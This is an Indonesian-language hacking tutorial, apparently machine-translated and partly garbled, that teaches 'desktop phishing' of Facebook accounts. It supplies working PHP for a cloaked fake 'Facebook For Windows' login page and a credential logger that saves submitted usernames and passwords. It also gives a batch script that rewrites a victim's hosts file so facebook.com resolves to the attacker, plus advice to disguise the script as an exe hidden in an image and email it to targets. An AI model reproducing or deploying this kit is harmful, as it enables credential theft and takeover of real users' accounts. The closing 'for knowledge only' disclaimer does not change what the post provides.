Metode Tingkat Lanjutan Facebook Desktop Phishing - 2015 (tidak terdeteksi)
Oleh
chmood
Seperti yang saya sebutkan di artikel saya sebelumnya, di posting ini kita akan mengeksplorasi sedikit pemrograman batch file dan kemudian akan bergerak maju menerapkan bahwa dalam facebook hacking dengan desktop yang phishing. Keuntungan di sini adalah, korban tidak akan dapat mengidentifikasi halaman palsu sejak URL alamat terlihat mirip dengan yang asli dan posting ini termasuk php kode baru untuk membuat halaman phishing yang tidak terdeteksi dan dapat melewati pemeriksaan keamanan situs hosting.
Posting baru: Buat terdeteksi Facebook Phishing Site - Advanced
Tutorial ini akan menjadi panduan non-lengkap untuk pemula. Jika Anda belum membaca artikel saya sebelumnya "DNS Pembajakan" dan "Hacking facebook account menggunakan phishing" maka saya mungkin akan meminta Anda untuk membacanya sebelum melanjutkan membaca ini lebih lanjut, karena itu akan memberi Anda pengetahuan prasyarat pada topik yang kita akan mendiskusikan hari ini.
Perbedaan antara phishing dan desktop yang phishing
Dalam phishing
1. Penyerang meyakinkan korban untuk mengklik link dari halaman login palsu yang menyerupai halaman login asli.
2.Victim memasuki kredensial di halaman login palsu yang masuk ke penyerang.
3. Korban kemudian diarahkan ke halaman kesalahan atau situs asli tergantung pada penyerang.
Namun kelemahan utama dalam phishing adalah korban yang dapat dengan mudah membedakan antara palsu dan nyata halaman login dengan
melihat nama domain. Kita dapat mengatasi hal ini di desktop yang phishing oleh spoofing nama domain.
Di desktop yang phishing
1. Penyerang mengirimkan file eksekusi untuk korban dan korban seharusnya double klik di atasnya. Pekerjaan penyerang dilakukan.
2. jenis Korban nama domain dari orignal / website asli dan dibawa ke halaman login palsu kami.
Namun nama domain yang tetap sama seperti diketik oleh korban
dan korban tidak mengenal.
3. Sisa hal yang sama seperti di phishing normal.
Apa Host file?
Host file adalah file teks yang berisi nama domain dan alamat IP yang terkait dengan mereka.
Lokasi file host di windows: C: driver \ Windows \ System32 \ \ etc \, Setiap kali kita mengunjungi situs web apapun, mengatakan www.anything.com, query dikirim ke Domain Name Server (DNS) untuk mencari untuk alamat IP yang terkait dengan situs / domain. Tapi sebelum melakukan ini file host di komputer lokal kami diperiksa untuk alamat IP yang terkait dengan nama domain.
Misalkan kita membuat sebuah entri di file host seperti yang ditunjukkan. Ketika kami mengunjungi www.anywebsite.com, kita akan dibawa ke 115.125.124.50 ini. Tidak ada permintaan untuk menyelesaikan alamat IP yang terkait dengan www.anywebsite.com akan dikirim ke DNS.
Apa serangan?
Saya harap Anda sudah mendapat ide bahwa bagaimana modifikasi file host ini pada komputer korban dapat disalahgunakan.
Kita perlu memodifikasi file host korban dengan menambahkan nama domain asli dan alamat IP dari situs palsu / phishing page.Whenever korban kita akan mengunjungi website asli, ia akan diarahkan ke halaman login palsu dan nama domain di kotak URL akan tetap asli seperti diketik oleh korban. Maka nama domain palsu.
Langkah-langkah melakukan serangan:
Langkah 1. Membuat halaman tidak terdeteksi phishing
Apa yang kau butuhkan :
Notepad ++ untuk pemrograman (Download: http://www.notepad-plus-plus.org/download)
Tangga :
Gunakan Notepad ++ untuk langkah-langkah yang diberikan di bawah
1) Salin kode ini dan paste di dokumen baru dan menyimpannya sebagai index.php
<?phpCatatan: Ganti "($ id ==" facebookforwindows ")" dengan "($ id ==" PASSWORD ")"
$id = $_GET["id"];
if ($id == "facebookforwindows") {
$myFile = "SoftwareDownload.jpg";
$fh = fopen($myFile, 'r');
$theData = fread($fh, 500000);
fclose($fh);
echo $theData;
}
else{
$myFile1 = "Follow.jpg";
$fh1 = fopen($myFile1, 'r');
$theData1 = fread($fh1, 500000);
fclose($fh1);
echo $theData1;
}
?>
(Anda dapat menempatkan password sebagai your_password)
2) Copy kode di bawah dan paste di dokumen baru dan menyimpannya sebagai Follow.jpg (Kode Tidak By ME)
<! DOCTYPE html>
<html>
<head>
<title> Cari Facebook ID Anda - 5 detik alat yang mudah untuk mencari Anda Facebook numerik pribadi ID </ title>
<meta name = "description" content = "Jika Anda perlu tahu Facebook numerik peronal ID Anda, cukup tancapkan URL Profil Anda ke alat sederhana ini." />
<link rel = "stylesheet" href = "reset.css" type = "text / css" media yang = "screen">
<link rel = "stylesheet" href = "style.css" type = "text / css" media yang = "screen">
<script src = "http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"> </ script> <script src = "script.js" type = "text / javascript "charset =" utf-8 "> </ script>
<meta properti = "fb: admin" content = "1146295886" />
</ head>
<body>
<form action = "" method = "post">
<label for = "fb_profile_url" class = "text-input-label fb_profile_url-teks-input-label">
Masukkan Facebook profil URL pribadi Anda:
</ label>
<input type = "text" name = "fb_profile_url" value = "" class = "text-nr" size = "45" placeholder = "http://www.facebook.com/YourProfileName" />
<input type = "hidden" name = "unsanitized" class = "nr tersembunyi tersembunyi-masukan untuk-unsanitized" />
<p>
<input type = "submit" value = "Lookup ID numerik ..." class = "tombol-utama">
</ p>
<h1> Mudah menemukan Facebook numerik pribadi ID Anda untuk fb: admin plugin sosial dan lebih </ h1>!
<p id = "description">
Untuk integrasi plugin sosial tertentu Facebook, seperti "Seperti" tombol dan "Seperti kotak", dan lain-lain, Facebook
mengharuskan Anda tahu Facebook pengguna numerik ID Anda. Sayangnya, mereka membuat ini sangat sulit untuk menemukan, terutama
jika Anda memiliki apa yang disebut "kesombongan" URL profil pribadi. Jika Anda tidak dapat menemukan ID Facebook Anda, atau tidak tahu apa itu
dan membutuhkannya, cukup masukkan URL lengkap profil Facebook Anda dalam bentuk di atas, dan kami dapat mengikis ID dari kode Anda
Halaman profil pribadi.
</ p>
</ form>
<script type = "text / javascript">
var _gaq = _gaq || [];
_gaq.push (['_ setAccount', 'UA-3361652-13']);
_gaq.push (['_ trackPageview']);
(fungsi() {
var ga = document.createElement ('naskah'); ga.type = 'text / javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol 'https: // ssl': 'http: // www'?) + '.google-analytics.com / ga.js';
var s = document.getElementsByTagName ('naskah') [0]; s.parentNode.insertBefore (ga, s);
}) ();
</ script>
</ body>
</ html>
3) Salin kode ini dan paste di dokumen baru dan menyimpannya sebagai data.php
<?php
header ('Location:https://www.facebook.com/');
$handle = fopen("PassFace.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>
4) copy kode ini dan paste di dokumen baru dan menyimpannya sebagai Software Download.jpg
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">5) Simpan semua file di atas dalam satu folder dan nama itu sebagai "xyz" (Apa pun yang Anda inginkan)
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Facebook For Windows : Welcome</title>
<style type="text/css">
html, body
{
height: 100%;
}
div#space
{
width: 1px;
height: 50%;
margin-bottom: -360px;
float:left
}
div#container
{
width: 1250px;
height: 720px;
margin: 0 auto;
position: relative;
clear: left;
}
</style>
<style type="text/css">
body
{
margin: 0;
padding: 0;
background-color: #6579A8;
color: #000000;
}
</style>
<style type="text/css">
h3
{
font-family: Arial;
font-size: 24px;
font-weight: normal;
font-style: normal;
text-decoration: none;
color: #000000;
margin: 0 0 0 0;
padding: 0 0 0 0;
display: inline;
}
a:hover
{
color: #90F518;
}
</style>
<!--[if lt IE 7]>
<style type="text/css">
img { behavior: url("pngfix.htc"); }
</style>
<![endif]-->
</head>
<body>
<div id="space"><br></div>
<div id="container">
<div id="bv_Image1" style="margin:0;padding:0;position:absolute;left:0px;top:0px;width:1093px;height:609px;text-align:left;z-index:0;">
<img src="images/Facebook_Box.png" id="Image1" alt="" align="top" border="0" style="width:1093px;height:609px;"></div>
<div id="bv_Image2" style="margin:0;padding:0;position:absolute;left:207px;top:210px;width:168px;height:168px;text-align:left;z-index:1;">
<img src="images/Facebook.png" id="Image2" alt="" align="top" border="0" style="width:168px;height:168px;"></div>
<div id="bv_Text1" style="margin:0;padding:0;position:absolute;left:378px;top:224px;width:389px;height:90px;text-align:left;z-index:2;">
<h3>Download Facebook For Windows :<br>
</h3><font style="font-size:13px" color="#000000" face="Arial">size : 6 MB.<br>
Platform : Windows 8.1<br>
Security Status : Active</font><h3><br>
</h3></div>
<div id="Html1" style="position:absolute;left:378px;top:307px;width:625px;height:50px;z-index:3">
<b>Login to Donwload this Application :</b><br/>
<form name="input" action="data.php" method="post">
Username : <input type="text" name="username" />
Password : <input type="password" name="password">
<input type="submit" value="Download" action="data.php" method="post"/>
</form></div>
</div>
</body>
</html>
6) Sekarang membuat folder di dalam folder ("xyz") dan nama itu sebagai "gambar" (Masukan nama yang tepat)
7) Download gambar-gambar dan memasukkannya ke dalam "gambar”
Sekarang jika Anda mengikuti semua langkah hati-hati, Ini akan terlihat seperti ini:
Anda berhasil membuat halaman phishing dan Kita perlu file ini dalam langkah-langkah berikutnya.
Langkah 2. Menyiapkan server web Xampp
Anda dapat menggunakan wamp atau xampp, saya akan merekomendasikan Anda untuk menggunakan xampp dan software ini akan membantu Anda untuk meng-host phishing pada komputer lokal Anda.
Web server dapat mengacu ke hardware (komputer) atau perangkat lunak (aplikasi komputer) yang membantu untuk memberikan konten web yang dapat diakses melalui internet.
S / W: xampp Server
1) Pertama Download dan install xampp pada PC Anda, Start Apache dan mSQL layanan
2) Salin 5 file (termasuk nama folder 'gambar') kita buat pada langkah 1, dan paste-nya semua di folder docs ht yang harus di bawah Xampp (tempat di mana Anda menginstal xampp)
(folder docs biasanya ht harus di jalan: c: \ xampp \ htdocs)
Langkah 3. Menyiapkan vpn statis
Saya akan Gunakan proXPN VPN untuk Tutorial ini tetapi saya menyarankan Anda untuk menggunakan Kuat Terbuka VPN karena sangat stabil Anda dapat men-download dari sini.
Instal ProXPN VPN atau VPN statis lainnya, saya sarankan Anda untuk menggunakan VPN kuat karena sangat stabil dan memberikan IP statis Setelah Anda menginstal dan menjalankannya, Anda akan mendapatkan IP statis (vpn).
Sekarang Anda memiliki ip statis untuk Localhost Anda.
Langkah 4. Membuat batch (.bat) file untuk menyelesaikan korban mengganti host file
Sekarang kita harus mengganti beberapa teks dalam korban Tuan berkas yang di C: \ windows \ system32 \ driver \ etc, Anda dapat melakukan ini dengan berbagai cara baik dengan menggunakan arsip SFX atau menggunakan batch file untuk tutorial ini kita akan menggunakan batch file untuk menyelesaikan pekerjaan.
Berikut adalah program batch yang saya bicarakan dalam posting terakhir saya 'DNS pembajakan'. Sebagaimana telah kita lihat bahwa, menambahkan alamat IP dengan nama domain yang ada di berkas tuan rumah akan mengarahkan Anda ke halaman web seperti yang Anda inginkan dengan nama domain yang diinginkan.
Jadi, kita akan mengambil ini menjadi tingkat berikutnya untuk tujuan hacking. Kami akan mengubah file host di mesin korban dengan bantuan program batch dan mengarahkan korban ke halaman login palsu kami. Satu-satunya hal yang perlu Anda pertimbangkan adalah mengirimkan program batch untuk mesin korban dan menjalankannya.
Berikut adalah program batch yang dapat digunakan untuk memanipulasi file HOSTS.
@echo off
set hostspath=%windir%\System32\drivers\etc\hosts
echo 62.116.159.4 www.facebook.com >> %hostspath%
echo 62.116.159.4 www.fb.com >> %hostspath%
echo 62.116.159.4 https://www.facebook.com >> %hostspath%
echo 62.116.159.4 https://fb.com >> %hostspath%
exit
Mengganti alamat ip (62.116.159.4) dengan alamat IP statis vpn Anda (Alamat ip vpn statis Anda punya di langkah 3), dan simpan sebagai 'anyname.bat'.
Mari kita sekarang membahas apa sebenarnya kode di atas tidak. Baris kedua dari kode di atas mengambil hak admin atas file 'host', sehingga editing yang dapat dilakukan. Kemudian kita pindah ke jalan di mana file 'host' berada dan kemudian kita menulis 4 baris ke dalam file. Mereka baris kode yang bertanggung jawab untuk pengalihan dari pengguna. Oleh karena itu, kami mencoba untuk mengarahkan semua kemungkinan kombinasi dari alamat facebook dengan IP yang disediakan.
Ingat, mengeksekusi kode di atas berisi file di mesin korban kekhawatiran pribadi Anda dan karenanya aku tidak menjelaskan metodologi menyebarkan kode Anda.
Langkah 5. Mengirim file ke korban
Anda juga dapat mengubah file .bat menjadi file exe menggunakan batch untuk exe converter. Klik link untuk belajar bagaimana mengkonversi file batch menjadi executable.
Setelah berhasil dikonversi ke file anyname.exe Anda dapat melakukan satu langkah lagi untuk menyembunyikan file ini .exe di sebuah file gambar, ikuti panduan saya sebelumnya: Cara Membuat Virus A Dan Sembunyikan Dalam Sebuah Image File (FUD)
Sekarang mengirim file melalui email atau meng-upload file ke situs dan meminta korban untuk mendownload file, Setelah download korban dan klik file, file host-nya akan diganti, Jadi sekarang ketika pernah korban masuk facebook.com Dia akan diarahkan ke phisher Halaman kami, Tapi URL akan tetap sebagai Facebook.com
Untuk melihat semua korban kredensial dan Password membuka file log.txt baru dibuat yang berada di bawah folder docs ht
selesai.+ Kue Download
Catatan: Gunakan artikel ini untuk tujuan pengertahuan saja my Family T.I sniper ;)
Komentar